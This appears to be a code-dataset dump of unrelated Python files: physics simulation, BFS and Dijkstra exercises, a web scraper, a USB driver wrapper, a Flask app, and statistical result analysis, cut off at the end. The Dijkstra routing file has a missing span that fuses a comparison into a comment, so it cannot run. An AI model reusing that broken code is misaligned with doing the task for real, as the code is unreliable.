+{"seq_id":"576861903","text":"import random\nimport numpy as np\nfrom numpy.random import *\nfrom scipy.integrate import odeint\n\n\ndef PendulumFn(x1range, x2range, numICs, tSpan, seed,\n               max_potential):  # function X = PendulumFn(x1range, x2range, numICs, tSpan, seed, max_potential)\n    # try some initial conditions for x1, x2\n    np.random.seed(seed=seed)\n\n    def dynsys(x, t):\n        dydt = np.zeros_like(x)\n        dydt[0] = x[1]  # x[1, :]\n        dydt[1] = -np.sin(x[0])  # x[0, :]\n        # print(dydt)\n        return dydt\n\n    def dynsys2(t, x):\n        return [x[0, :], -np.sin(x[0, :])]  # [x[1,:]; -np.sin(x[1,:])]\n\n    lenT = len(tSpan)\n\n    X = np.zeros((numICs * lenT, 2))\n\n    def potential(x, y):\n        return (1 / 2) * y ** 2 - np.cos(x)\n\n    # t = dynsys(2, [[2, 5], [4, 9]])\n\n    count = 1\n    for j in range(100 * numICs):  # j = 1:100*numICs\n        # randomly start from x1range(1) to x1range(2)\n        x1 = (x1range[1] - x1range[0]) * rand() + x1range[0]\n\n        # randomly start from x2range(1) to x2range(2)\n        x2 = (x2range[1] - x2range[0]) * rand() + x2range[0]\n\n        if potential(x1, x2) <= max_potential:\n            ic = [x1, x2]\n            temp = odeint(dynsys, ic, tSpan)\n            # [T, temp] = odeint(dynsys, ic, tSpan)\n\n            X[(count - 1) * lenT: lenT + (count - 1) * lenT, :] = temp\n            if count == numICs:\n                break\n            count = count + 1\n\n    if count < numICs:\n        print('oops, potential energy too small for IC box')\n\n    return X\n","sub_path":"data/PendulumFn.py","file_name":"PendulumFn.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"50106107","text":"# No. 2606\n# 바이러스\n# https://www.acmicpc.net/problem/2606\n\n# -문제\n# 7대의 컴퓨터가 <그림 1>과 같이 네트워크 상에서 연결되어 있다고 하자.\n# 1번 컴퓨터가 웜 바이러스에 걸리면 웜 바이러스는 2번과 5번 컴퓨터를 거쳐 3번과 6번 컴퓨터까지 전파되어\n# 2, 3, 5, 6 네 대의 컴퓨터는 웜 바이러스에 걸리게 된다.\n# 하지만 4번과 7번 컴퓨터는 1번 컴퓨터와 네트워크상에서 연결되어 있지 않기 때문에 영향을 받지 않는다.\n#\n#       1 ㅡㅡ 2 ㅡㅡ 3    4\n#        \\   /          /\n#          5 ㅡㅡ 6    7\n#             <그림 1>\n#\n# 어느 날 1번 컴퓨터가 웜 바이러스에 걸렸다.\n# 컴퓨터의 수와 네트워크 상에서 서로 연결되어 있는 정보가 주어질 때,\n# 1번 컴퓨터를 통해 웜 바이러스에 걸리게 되는 컴퓨터의 수를 출력하는 프로그램을 작성하시오.\n\n# -입력\n# 첫째 줄에는 컴퓨터의 수가 주어진다. 컴퓨터의 수는 100 이하이고 각 컴퓨터에는 1번 부터 차례대로 번호가 매겨진다.\n# 둘째 줄에는 네트워크 상에서 직접 연결되어 있는 컴퓨터 쌍의 수가 주어진다.\n# 이어서 그 수만큼 한 줄에 한 쌍씩 네트워크 상에서 직접 연결되어 있는 컴퓨터의 번호 쌍이 주어진다.\n\n# -출력\n# 1번 컴퓨터가 웜 바이러스에 걸렸을 때, 1번 컴퓨터를 통해 웜 바이러스에 걸리게 되는 컴퓨터의 수를 첫째 줄에 출력한다.\n\n# example input\n#\n# 7\n# 6\n# 1 2\n# 2 3\n# 1 5\n# 5 2\n# 5 6\n# 4 7\n\nfrom collections import deque\n\n\ndef bfs(v):\n    queue = deque()\n    queue.append(v)\n\n    # 큐가 있는동안 반복\n    while queue:\n        v = queue.popleft()\n        if v not in ans:\n            ans.append(v)\n            for i in data:\n                a = i[0]\n                b = i[1]\n                if a == v:\n                    queue.append(b)\n                elif b == v:\n                    queue.append(a)\n\n    return len(ans) - 1\n\n\nn = int(input())\nm = int(input())\n\ndata = []\nfor _ in range(m):\n    data.append(list(map(int, input().split())))\n\n# 양방향 간선이기에 노드가 작은 값을 앞으로 정렬\nfor i in data:\n    if i[0] > i[1]:\n        i.reverse()\ndata.sort()\n\nans = []\n\nprint(bfs(1))\n","sub_path":"BFS/#2606.py","file_name":"#2606.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"40120246","text":"\"\"\"\nThe Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).\nhttps://creativecommons.org/licenses/by/4.0/\nhttps://creativecommons.org/licenses/by/4.0/legalcode\n\nCopyright (c) COLONOLNUTTY\n\"\"\"\nfrom typing import Any, Callable\n\nfrom sims4communitylib.utils.common_function_utils import CommonFunctionUtils\nfrom sims4communitylib.dialogs.option_dialogs.options.common_dialog_option_context import CommonDialogOptionContext\nfrom sims4communitylib.dialogs.option_dialogs.options.objects.common_dialog_select_option import CommonDialogSelectOption\n\n\nclass CommonDialogActionOption(CommonDialogSelectOption):\n    \"\"\"CommonDialogActionOption(context, on_chosen=CommonFunctionUtils.noop)\n\n    An option that invokes a callback upon being chosen.\n\n    :param context: A context to customize the dialog option.\n    :type context: CommonDialogOptionContext\n    :param on_chosen: A callback invoked when the dialog option is chosen.\n    :type on_chosen: Callable[..., Any], optional\n    \"\"\"\n    def __init__(\n        self,\n        context: CommonDialogOptionContext,\n        on_chosen: Callable[..., Any]=CommonFunctionUtils.noop,\n    ):\n        def _on_chosen(_, __):\n            on_chosen()\n\n        super().__init__(\n            'Dialog Action',\n            None,\n            context,\n            on_chosen=_on_chosen\n        )\n","sub_path":"Scripts/sims4communitylib/dialogs/option_dialogs/options/objects/common_dialog_action_option.py","file_name":"common_dialog_action_option.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"392934745","text":"from requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\nimport re\nimport time\n\ndef get_html(url):\n    try:\n        with closing(get(url, stream=True)) as resp:\n            ctype = resp.headers['Content-Type'].lower()\n\n            if resp.status_code == 200 and ctype is not None and ctype.find('html') > -1:\n                return resp.content\n            else:\n                return None\n\n    except RequestException as e:\n        return None\n\ndef get_links(raw_html):\n    root = BeautifulSoup(raw_html, 'html.parser')\n    mainsite = root.findAll('div', {'class': 'site-main'})[0]\n    return [article.find('a')['href'] for article in mainsite.findAll('article')]\n\ndef get_article_text(raw_html):\n    root = BeautifulSoup(raw_html, 'html.parser')\n    article = root.find('article').find('div', {'class': 'entry-content'})\n    texts = article.findAll('p', {'style': 'text-align: justify;'})\n    parsed = []\n\n    for text in texts:\n        try:\n            no_escapes = re.sub(r\"([#\\\\?])(\\w+)\\b\", ' ', text.find(text=True))\n            parsed.append(' '.join(no_escapes.split()))\n        except:\n            pass\n\n    return parsed\n\n\nif __name__ == '__main__':\n    for page_num in range(21, 40):\n        texts = []\n        time.sleep(2)\n        print('index:', page_num)\n        \n        index_html = get_html('https://www.amodelrecommends.com/category/beauty/page/' + str(page_num) + '/')\n        links = get_links(index_html)\n\n        for link in links:\n            print(link)\n            time.sleep(3)\n            article_html = get_html(link)\n            texts = texts + get_article_text(article_html)\n            \n\n        with open('parsed_amodelrecommends' + str(page_num) + '.txt', 'w') as outfile:\n            for text in texts:\n                outfile.write(text)\n                outfile.write('\\n')\n","sub_path":"Teams/semeai tech/util/parser/amrparser.py","file_name":"amrparser.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"610879810","text":"## CTI-110 \r\n## P4T2: Bug Collector\r\n## Dominique Perteet\r\n## 6/28/2018\r\n\r\n\r\n# Initialize the accumlator.\r\ntotal = 0\r\n\r\n# Get the bugs collected for each day.\r\nfor day in range(1, 8):\r\n    # Prompt the user.\r\n    print('Enter the bus collected on day', day)\r\n\r\n    # Input the number of bugs.\r\n    bugs = int(input())\r\n\r\n    # Add bugs to total.\r\n    total += bugs\r\n\r\n# Display the total bugs.\r\nprint('Collected a total of', total, 'bugs')\r\n","sub_path":"P4T2Bug CollectorPerteetDominique.py","file_name":"P4T2Bug CollectorPerteetDominique.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"298492563","text":"\n\nfrom xai.brain.wordbase.nouns._semaphore import _SEMAPHORE\n\n#calss header\nclass _SEMAPHORING(_SEMAPHORE, ):\n\tdef __init__(self,): \n\t\t_SEMAPHORE.__init__(self)\n\t\tself.name = \"SEMAPHORING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"semaphore\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_semaphoring.py","file_name":"_semaphoring.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"307083679","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[32]:\n\n\nimport sys\nimport copy\ndef GetAdjlist(filename):\n    with open(filename,'r') as casefile:\n        case = casefile.read()\n        graphrows = case.split('\\n')\n        Adjlist=[]\n        for i in range(len(graphrows)):\n            a=graphrows[i].split(' ')\n            for j in range(len(a)):\n                a[j]=int(a[j])\n            Adjlist.append(a)\n        return Adjlist\n    \n\n\n\ndef findnextnode(dis,inf_dis):\n    nextnode={}\n    if inf_dis==True:\n        for i in range(len(dis)):  #i從0到n-1,node=i+1\n            if dis[i]!=0:\n                nextnode[i+1]=dis[i]\n                \n    if inf_dis==False:\n        for i in range(len(dis)):  #i從0到n-1,node=i+1\n            if dis[i]!=0 and dis[i]!=-1:\n                nextnode[i+1]=dis[i]\n    return nextnode\n\n\n\n\ndef Dijkstra_algorithm(Adjlist):\n    Adjlist=copy.deepcopy(Adjlist)\n    Graphsize = Adjlist[0][0]\n    Q=set(i for i in range(1,Graphsize+1))\n    nextrouter=[[None]]+[[i for i in range(1,Graphsize+1)] for j in range(Graphsize)]\n    \n    while Q:\n        nownode = Q.pop()\n        dis=Adjlist[nownode]\n        c=findnextnode(dis,False)\n        \n        while c.keys():\n            closestnode = min(c, key=c.get)\n            closestnodepath = findnextnode(Adjlist[closestnode],False)\n            \n            for i in closestnodepath.keys():\n                \n                if closestnodepath[i]+c[closestnode]remove router=-1 \n        Adjlist[i][router-1]=-1\n    for j in range(len(Adjlist[router])):  #The distance remove router->other router=-1 \n        Adjlist[router][j]=-1\n    Adjlist[router][router-1]=0  #remove router->remove router=0\n    return Adjlist\n\n\n# In[31]:\n\n\ndef main():    \n    if sys.argv[1]=='lf':\n        load = GetAdjlist(sys.argv[2])\n\n        with open ('log.txt','w') as logf:\n            logf.write(str(load)) #write adjlist into log.txt\n        with open ('file_name.txt','w') as fname:\n            fname.write(sys.argv[2][:-4])\n        with open ('router_rec.txt','w') as f:\n            f.write('[]')\n\n\n    if sys.argv[1]=='rm':\n        with open ('log.txt','r') as logf:\n            OpAdjlist=eval(logf.read())\n\n\n        rm = removerouter(OpAdjlist,int(sys.argv[2][1:]))\n        with open ('log.txt','w') as logf:\n            logf.write(str(rm)) #write adjlist into log.txt\n        with open ('router_rec.txt','r') as f:\n            a=eval(f.read())\n            a.append(int(sys.argv[2][1:]))\n        with open ('router_rec.txt','w') as f:\n            f.write(str(a))\n\n\n    if sys.argv[1]=='of':\n        with open ('log.txt','r') as logf:\n            OpAdjlist=eval(logf.read())\n        with open ('router_rec.txt','r') as f:\n            rmrouter = eval(f.read())\n\n        with open ('file_name.txt','r') as fname:\n            Opfilename = fname.read()+'_out2.txt'\n\n        Writetxt(OpAdjlist,Opfilename,rmrouter)\n\n        \nmain()\n\n\n# In[30]:\n\n\n\n\n\n# In[28]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"B08901067_hw3/src_2/Dijkstra2.py","file_name":"Dijkstra2.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"582628861","text":"from ctypes import *\r\n\r\nfrom CH341DriverBase import *\r\n\r\n\r\n# MIT License.\r\n\r\n\r\nclass CH341Driver:\r\n    \"\"\"\r\n    This is basic interface code for a CH341 to be run in EPP 1.9 mode.\r\n    \"\"\"\r\n\r\n    def __init__(self, index=-1, bus=-1, address=-1, serial=-1, chipv=-1, state_listener=None):\r\n        if state_listener is None:\r\n            self.state_listener = lambda code: None\r\n        else:\r\n            self.state_listener = state_listener\r\n        try:\r\n            self.driver = windll.LoadLibrary(\"CH341DLL.dll\")\r\n        except (NameError, OSError):\r\n            raise ConnectionRefusedError\r\n        self.driver_index = 0\r\n        self.index = index\r\n        self.bus = bus\r\n        self.address = address\r\n        self.serial = serial\r\n        self.chipv = chipv\r\n        self.driver_value = None\r\n        self.state = None\r\n\r\n    def set_status(self, code):\r\n        self.state_listener(code)\r\n        self.state = code\r\n\r\n    def try_open(self, i):\r\n        \"\"\"Tries to open device at index, with given criteria\"\"\"\r\n        self.driver_index = i\r\n        val = self.driver.CH341OpenDevice(self.driver_index)\r\n        self.driver_value = val\r\n        if val == -1:\r\n            self.driver_value = None\r\n            self.set_status(STATE_CONNECTION_FAILED)\r\n            raise ConnectionRefusedError  # No more devices.\r\n        # There is a device.\r\n        if self.chipv != -1:\r\n            chipv = self.get_chip_version()\r\n            if self.chipv != chipv:\r\n                # Rejected.\r\n                self.set_status(STATE_DEVICE_REJECTED)\r\n                self.driver.CH341CloseDevice(self.driver_index)\r\n                return -1\r\n        if self.bus != -1:\r\n            pass  # Windows driver no bus check.\r\n        if self.address != -1:\r\n            pass  # Windows driver no address check.\r\n        if self.serial != -1:\r\n            pass  # No driver has a serial number.\r\n        # The device passes our tests.\r\n        return 0\r\n\r\n    def open(self):\r\n        \"\"\"\r\n        Opens the driver for unknown criteria.\r\n        \"\"\"\r\n        if self.driver_value is None:\r\n            self.set_status(STATE_DRIVER_CH341)\r\n            self.set_status(STATE_CONNECTING)\r\n            if self.index == -1:\r\n                for i in range(0, 16):\r\n                    if self.try_open(i) == 0:\r\n                        break  # We have our driver.\r\n            else:\r\n                self.try_open(self.index)\r\n            self.set_status(STATE_USB_CONNECTED)\r\n            self.set_status(STATE_CH341_PARAMODE)\r\n            try:\r\n                self.driver.CH341InitParallel(self.driver_index, 1)  # 0x40, 177, 0x8800, 0, 0\r\n                self.set_status(STATE_CH341_PARAMODE_SUCCESS)\r\n            except ConnectionError:\r\n                self.set_status(STATE_CH341_PARAMODE_FAIL)\r\n                self.driver.CH341CloseDevice(self.driver_index)\r\n            # self.driver.CH341SetExclusive(self.driver_index, 1)\r\n            self.set_status(STATE_CONNECTED)\r\n\r\n    def close(self):\r\n        \"\"\"\r\n        Closes the driver for the stated device index.\r\n        \"\"\"\r\n        self.driver_value = None\r\n        self.set_status(STATE_USB_SET_DISCONNECTING)\r\n        if self.driver_value == -1:\r\n            self.set_status(STATE_USB_RESET_FAIL)\r\n            raise ConnectionError\r\n        
self.driver.CH341CloseDevice(self.driver_index)\r\n        self.set_status(STATE_USB_DISCONNECTED)\r\n\r\n    def write(self, packet):\r\n        \"\"\"\r\n        Writes a 32 byte packet to the device. This is typically \\x00 + 30 bytes + CRC\r\n        The driver will packetize the \\0xA6 writes.\r\n\r\n        :param packet: 32 bytes of data to be written to the CH341.\r\n        :return:\r\n        \"\"\"\r\n        if self.driver_value == -1:\r\n            raise ConnectionError\r\n        length = len(packet)\r\n        obuf = (c_byte * length)()\r\n        for i in range(length):\r\n            obuf[i] = packet[i]\r\n        length = (c_byte * 1)()\r\n        length[0] = 32\r\n        self.driver.CH341EppWriteData(self.driver_index, obuf, length)\r\n\r\n    def get_status(self):\r\n        \"\"\"\r\n        Gets the status bytes from the CH341. This is usually 255 for the D0-D7 values\r\n        And the state flags for the chip signals. Importantly are WAIT which means do not\r\n        send data, and ERR which means the data sent was faulty. And PEMP which means the\r\n        buffer is empty.\r\n\r\n        StateBitERR\t\t0x00000100\r\n        StateBitPEMP\t0x00000200\r\n        StateBitINT\t\t0x00000400\r\n        StateBitSLCT\t0x00000800\r\n        StateBitWAIT\t0x00002000\r\n        StateBitDATAS\t0x00004000\r\n        StateBitADDRS\t0x00008000\r\n        StateBitRESET\t0x00010000\r\n        StateBitWRITE\t0x00020000\r\n        StateBitSCL\t    0x00400000\r\n        StateBitSDA\t\t0x00800000\r\n        :return:\r\n        \"\"\"\r\n        if self.driver_value == -1:\r\n            raise ConnectionRefusedError\r\n        obuf = (c_byte * 6)()\r\n        self.driver.CH341GetStatus(self.driver_index, obuf)\r\n        return [int(q & 0xff) for q in obuf]\r\n\r\n    def get_chip_version(self):\r\n        \"\"\"\r\n        Gets the version of the CH341 chip being used.\r\n        :return: version. Eg. 48.\r\n        \"\"\"\r\n        if self.driver_value == -1:\r\n            raise ConnectionRefusedError\r\n        return self.driver.CH341GetVerIC(self.driver_index)\r\n","sub_path":"CH341WindllDriver.py","file_name":"CH341WindllDriver.py","file_ext":"py","file_size_in_byte":5269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"127300254","text":"settings = {\n    \"template_dir\": \"gunicorn\", # Type of template to match\n    \"site_name\": \"edgemon\", \n    \"site_url\": \"edgemon.org\", # url, e.g. mysite.com\n    \"proxy_port\": 29002, # proxy for gunicorn\n    \"top_level\": True, # App is at the top level of a url.\n    'subdomains' : [ # Additional nginx servers\n        { \n            \"prefix\": \"guessthatnumber\" ,\n            # WTF mustache? You lose access to other variables inside a loop?\n            \"site_name\": \"edgemon\", \n            \"site_url\": \"edgemon.org\", # url, e.g. mysite.com\n            \"root\": \"/home/chris/www/guessthatnumber/\",\n          },\n        {\n            \"prefix\": \"opentable\",\n            \"site_url\": \"edgemon.org\",\n            \"rewrite\": \"http://restaurant-pockets.heroku.com\",\n            }\n        ]\n    }\n","sub_path":"mustache_settings/edgemon.py","file_name":"edgemon.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"77034975","text":"# import necessary libraries\nimport os\nimport pandas as pd\nfrom flask import (\n    Flask,\n    render_template,\n    jsonify,\n    request,\n    redirect)\n# from flask_sqlalchemy import SQLAlchemy\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom datetime import datetime\n\nfrom config import dbuser, dbpassword, dbhost, dbport, dbname\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Database Setup\n#################################################\n\n# try:\n#     db_uri = os.environ['DATABASE_URL']\n# except KeyError:\n#     db_uri = \"Insert Local Database\"\n\n# print(db_uri)\n# app.config['SQLALCHEMY_DATABASE_URI'] = db_uri\n\n# db = SQLAlchemy(app)\n\n# Connect session or connection to db\n# session = Session(engine)\n# connection = engine.connect()\n\n# Connect to Database - Alternative\nengine = create_engine(\n    f\"postgres://{dbuser}:{dbpassword}@{dbhost}:{dbport}/{dbname}\")\n# f'postgresql://{dbuser}:{dbpassword}@database-1.cvmfiiilpm7y.us-east-1.rds.amazonaws.com:{dbport}/{dbname}')\n\nsession = Session(engine)\nconnection = engine.connect()\n\nyoutubeVids = pd.read_sql(f\"SELECT * FROM youtube_table\", connection)\n\nconnection.close()\nsession.close()\n\n\n@app.route(\"/\")\ndef home():\n    return render_template(\"index.html\")\n\n\n@app.route(\"/data/\")\ndef data(country):\n    ##### Open a session/connection #####\n\n    singleCountry_youtubeVids = youtubeVids[youtubeVids[\"country\"] == country]\n\n    singleCountry_youtubeVids = singleCountry_youtubeVids.to_dict(\n        orient='records')\n    ##### Close the session/connection #####\n\n    ##### Return a json which could be parsed further using js #####\n    return jsonify(singleCountry_youtubeVids)\n\n\n@app.route(\"/bar//\")\ndef bar(country, metric):\n\n    barData = youtubeVids[youtubeVids[\"country\"] == country]\n\n    barData = barData.groupby('categoryId').sum()\n    barData = barData[metric]\n    barData = barData.to_dict()\n\n    return jsonify(barData)\n\n\n@app.route(\"/line//\")\ndef line(country, metric):\n    lineData = youtubeVids[youtubeVids[\"country\"] == country]\n    # add a timestamp column to dataframe\n    timestamps = []\n    for index, row in lineData.iterrows():\n        t = row[\"publishedAt\"]\n        td = datetime(t.year, t.month, t.day)\n        datetime.timestamp(td)\n        timestamps.append(datetime.timestamp(td))\n    lineData[\"timestamp\"] = timestamps\n    # get top three categories\n    topThree = list(lineData.groupby([\"categoryId\"]).sum()[\n                    \"likes\"].sort_values(ascending=False).index[0:3])\n    # Select one category and group by timeStamp\n    first = lineData[lineData[\"categoryId\"] == topThree[0]]\n    first = first.groupby(\"timestamp\").sum()\n    first = first[metric].to_dict()\n    return jsonify(first)\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"213169807","text":"import itertools\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scikit_posthocs as sp\nfrom scipy import stats\nfrom scipy.stats import ranksums\nfrom scipy.stats import ttest_ind\n\nfrom .losses import Losses\n\n\nclass AnalyseResults(object):\n    \"\"\"\n    Analyze results of machine learning experiments.\n\n    Parameters\n    ----------\n    result : sktime result object\n        class for storing the results\n    \"\"\"\n\n    def __init__(self,\n                 results):\n\n        self._results_list = results.load()\n\n    def prediction_errors(self, metric):\n        \"\"\"\n        Calculates the average prediction error per estimator as well as the prediction error achieved by each estimator on individual datasets.\n\n        Parameters\n        -----------\n        metric : `sktime.analyse_results.scores`\n            Error function \n        Returns\n        -------\n        pickle of pandas DataFrame\n            ``estimator_avg_error`` represents the average error and standard deviation achieved by each estimator. ``estimator_avg_error_per_dataset`` represents the average error and standard deviation achieved by each estimator on each dataset.\n        \"\"\"\n        # load all predictions\n        losses = Losses(metric)\n        for res in self._results_list:\n            y_pred = res.y_pred\n            y_pred = list(map(float, y_pred))\n            y_true = res.y_true\n            y_true = list(map(float, y_true))\n\n            losses.evaluate(predictions=y_pred,\n                            true_labels=y_true,\n                            dataset_name=res.dataset_name,\n                            strategy_name=res.strategy_name)\n        return losses.get_losses()\n\n    def average_and_std_error(self, scores_dict):\n        \"\"\"\n        Calculates simple average and standard error.\n\n        Paramteters\n        -----------\n        scores_dict : dictionary\n            Dictionary with estimators (keys) and corresponding prediction accuracies on different datasets.\n        \n        Returns\n        -------\n        pandas DataFrame\n            result with average score and standard error\n        \"\"\"\n        result = {}\n        for k in scores_dict.keys():\n            average = np.average(scores_dict[k])\n            n = len(scores_dict[k])\n            std_error = np.std(scores_dict[k]) / np.sqrt(n)\n            result[k] = [average, std_error]\n\n        res_df = pd.DataFrame.from_dict(result, orient='index')\n        res_df.columns = ['avg_score', 'std_error']\n        res_df = res_df.sort_values(['avg_score', 'std_error'], ascending=[1, 1])\n\n        return res_df\n\n    def plot_boxcharts(self, scores_dict):\n        data = []\n        labels = []\n        avg_error = []\n        for e in scores_dict.keys():\n            data.append(scores_dict[e])\n            avg_error.append(np.mean(scores_dict[e]))\n            labels.append(e)\n        # sort data and labels based on avg_error\n        idx_sort = np.array(avg_error).argsort()\n        data = [data[i] for i in idx_sort]\n        labels = [labels[i] for i in idx_sort]\n        # plot the results\n        fig, ax = plt.subplots()\n        ax.boxplot(data)\n        ax.set_xticklabels(labels, rotation=90)\n        plt.tight_layout()\n\n        return fig\n\n    def ranks(self, strategy_dict, ascending=True):\n        \"\"\"\n        Calculates the average ranks based on the performance of each estimator on each dataset\n\n       
 Parameters\n        ----------\n        strategy_dict: dictionary\n            dictionay with keys `names of estimators` and values `errors achieved by estimators on test datasets`.\n        ascending: boolean\n            Rank the values in ascending (True) or descending (False) order\n\n        Returns\n        -------\n        DataFrame\n            Returns the mean peformance rank for each estimator\n        \"\"\"\n        if not isinstance(ascending, bool):\n            raise ValueError('Variable ascending needs to be boolean')\n\n        df = pd.DataFrame(strategy_dict)\n        ranked = df.rank(axis=1, ascending=ascending)\n        mean_r = pd.DataFrame(ranked.mean(axis=0))\n        mean_r.columns = ['avg_rank']\n        mean_r = mean_r.sort_values('avg_rank', ascending=ascending)\n        return mean_r\n\n    def t_test(self, strategy_dict):\n        \"\"\"\n        Runs t-test on all possible combinations between the estimators.\n\n        Parameters\n        ----------\n        strategy_dict: dictionary\n            dictionay with keys `names of estimators` and values `errors achieved by estimators on test datasets`.\n        Returns\n        -------\n        tuple \n            pandas DataFrame (Database style and MultiIndex)\n        \"\"\"\n        t_df = pd.DataFrame()\n        perms = itertools.product(strategy_dict.keys(), repeat=2)\n        values = np.array([])\n        for perm in perms:\n            x = np.array(strategy_dict[perm[0]])\n            y = np.array(strategy_dict[perm[1]])\n            t_stat, p_val = ttest_ind(x, y)\n\n            t_test = {\n                'estimator_1': perm[0],\n                'estimator_2': perm[1],\n                't_stat': t_stat,\n                'p_val': p_val\n            }\n\n            t_df = t_df.append(t_test, ignore_index=True)\n            values = np.append(values, t_stat)\n            values = np.append(values, p_val)\n\n        index = t_df['estimator_1'].unique()\n        values_names = ['t_stat', 'p_val']\n        col_idx = pd.MultiIndex.from_product([index, values_names])\n        values_reshaped = values.reshape(len(index), len(values_names) * len(index))\n\n        values_df_multiindex = pd.DataFrame(values_reshaped, index=index, columns=col_idx)\n\n        return t_df, values_df_multiindex\n\n    def sign_test(self, strategy_dict):\n        \"\"\"\n        Non-parametric test for test for consistent differences between pairs of observations. 
See ``_ for details about the test and ``_ for details about the scipy implementation.\n\n        Parameters\n        ----------\n        strategy_dict: dictionary\n            dictionay with keys `names of estimators` and values `errors achieved by estimators on test datasets`.\n        Returns\n        -------\n        tuple of dataframes \n            pandas DataFrame (Database style), pivot table)\n        \"\"\"\n        sign_df = pd.DataFrame()\n        perms = itertools.product(strategy_dict.keys(), repeat=2)\n        for perm in perms:\n            x = np.array(strategy_dict[perm[0]])\n            y = np.array(strategy_dict[perm[1]])\n            signs = np.sum([i[0] > i[1] for i in zip(x, y)])\n            n = len(x)\n            p_val = stats.binom_test(signs, n)\n            sign_test = {\n                'estimator_1': perm[0],\n                'estimator_2': perm[1],\n                'p_val': p_val\n            }\n\n            sign_df = sign_df.append(sign_test, ignore_index=True)\n            sign_df_pivot = sign_df.pivot(index='estimator_1', columns='estimator_2', values='p_val')\n\n        return sign_df, sign_df_pivot\n\n    def ranksum_test(self, strategy_dict):\n        \"\"\"\n        Non-parametric test for testing consistent differences between pairs of obeservations.\n        The test counts the number of observations that are greater, smaller and equal to the mean\n        ``_.\n\n        Parameters\n        ----------\n        strategy_dict: dictionary\n            dictionay with keys `names of estimators` and values `errors achieved by estimators on test datasets`.\n        Returns\n        -------\n        tuple of pandas DataFrame \n            Database style and MultiIndex\n        \"\"\"\n        ranksum_df = pd.DataFrame()\n        perms = itertools.product(strategy_dict.keys(), repeat=2)\n        values = np.array([])\n        for perm in perms:\n            comb = perm[0] + ' - ' + perm[1]\n            x = strategy_dict[perm[0]]\n            y = strategy_dict[perm[1]]\n            t_stat, p_val = ranksums(x, y)\n            ranksum = {\n                'estimator_1': perm[0],\n                'estimator_2': perm[1],\n                't_stat': t_stat,\n                'p_val': p_val\n            }\n            ranksum_df = ranksum_df.append(ranksum, ignore_index=True)\n            values = np.append(values, t_stat)\n            values = np.append(values, p_val)\n\n        index = ranksum_df['estimator_1'].unique()\n        values_names = ['t_stat', 'p_val']\n        col_idx = pd.MultiIndex.from_product([index, values_names])\n        values_reshaped = values.reshape(len(index), len(values_names) * len(index))\n\n        values_df_multiindex = pd.DataFrame(values_reshaped, index=index, columns=col_idx)\n\n        return ranksum_df, values_df_multiindex\n\n    def t_test_with_bonferroni_correction(self, strategy_dict, alpha=0.05):\n        \"\"\"\n        correction used to counteract multiple comparissons\n        https://en.wikipedia.org/wiki/Bonferroni_correction\n\n        \n        Parameters\n        ----------\n        strategy_dict: dictionary\n            dictionay with keys `names of estimators` and values `errors achieved by estimators on test datasets`.\n        alpha: float\n            confidence level.\n        Returns\n        -------\n        DataFrame \n            MultiIndex DataFrame\n        \"\"\"\n        df_t_test, _ = self.t_test(strategy_dict)\n        idx_estim_1 = df_t_test['estimator_1'].unique()\n        idx_estim_2 = 
df_t_test['estimator_2'].unique()\n        estim_1 = len(idx_estim_1)\n        estim_2 = len(idx_estim_2)\n        critical_value = alpha / (estim_1 * estim_2)\n\n        bonfer_test = df_t_test['p_val'] <= critical_value\n\n        bonfer_test_reshaped = bonfer_test.values.reshape(estim_1, estim_2)\n\n        bonfer_df = pd.DataFrame(bonfer_test_reshaped, index=idx_estim_1, columns=idx_estim_2)\n\n        return bonfer_df\n\n    def wilcoxon_test(self, strategy_dict):\n        \"\"\"http://en.wikipedia.org/wiki/Wilcoxon_signed-rank_test\n        `Wilcoxon signed-rank test `_.\n        Tests whether two  related paired samples come from the same distribution. \n        In particular, it tests whether the distribution of the differences x-y is symmetric about zero\n\n        Parameters\n        ----------\n        strategy_dict: dictionary\n            Dictionary with errors on test sets achieved by estimators.\n        Returns\n        -------\n        tuple \n            pandas DataFrame (Database style and MultiIndex)\n        \"\"\"\n        wilcoxon_df = pd.DataFrame()\n        values = np.array([])\n        prod = itertools.product(strategy_dict.keys(), repeat=2)\n        for p in prod:\n            estim_1 = p[0]\n            estim_2 = p[1]\n            w, p_val = stats.wilcoxon(strategy_dict[p[0]],\n                                      strategy_dict[p[1]])\n\n            w_test = {\n                'estimator_1': estim_1,\n                'estimator_2': estim_2,\n                'statistic': w,\n                'p_val': p_val\n            }\n\n            wilcoxon_df = 